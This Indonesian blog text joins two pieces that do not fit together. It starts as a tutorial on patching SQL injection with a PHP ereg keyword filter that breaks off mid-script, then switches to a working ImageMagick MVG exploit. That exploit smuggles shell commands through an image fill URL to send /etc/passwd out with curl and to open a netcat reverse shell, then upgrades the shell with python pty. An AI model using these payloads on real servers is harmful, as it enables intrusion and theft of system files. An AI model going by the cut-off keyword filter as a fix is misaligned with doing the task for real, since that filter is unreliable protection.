Setelah lama ga ngeblog karena kesibukan didunia nyata, dan mumpung agak selo pada kesempatan kali ini gw mau berbagi tutorial Cara Patch Bug Sql Injection biar website aman dari serangan Hacker Kalian tau apa itu Sql Injection? agar kalian paham, mari kita bahas sedikit penjelasan tentang sql injection. Sql Injection adalah suatu teknik hacking yang digunakan oleh penyerang/attacker untuk mendapatkan sebuah database dengan menyisipkan perintah-perintah Sqli melalui url yang memanfaatkan bug yang disebabkan oleh kesalahan coding atau kurang pemfilteran pada variabel tersebut. Oke demikian sedikit penjelasan mengenai Sql Injection. Selanjutnya mari kita simak ketutorial cara mempatch bug sql injectionnya. Yang pertama, buka text editor, notepad++, dll atau apalah sesuai kesukaan kalian, lalu copy script dibawah ini. <? if (ereg("%20union%20", $_ GET['id'])||ereg("union",$_ GET['id']) || ereg("\*union\*",$_ GET[...
cek server save ke file jpg,png atau gif push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.0/oops.jpg"; cat /etc/passwd | curl -d @ http://(ip kamu):9700;touch "hello)' pop graphic-context save ke file mvg ush graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.0/oops.jpg"; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc (ip kamu) 31337 >/tmp/f;touch "hello)' pop graphic-context siapkan nc sudah dalam posisi listening Agar lebih interaktif, shell bash perlu kamu spawn dengan perintah: python -c 'import pty; pty.spawn("/bin/bash")' . terima kasih sekedar untuk menyimpan data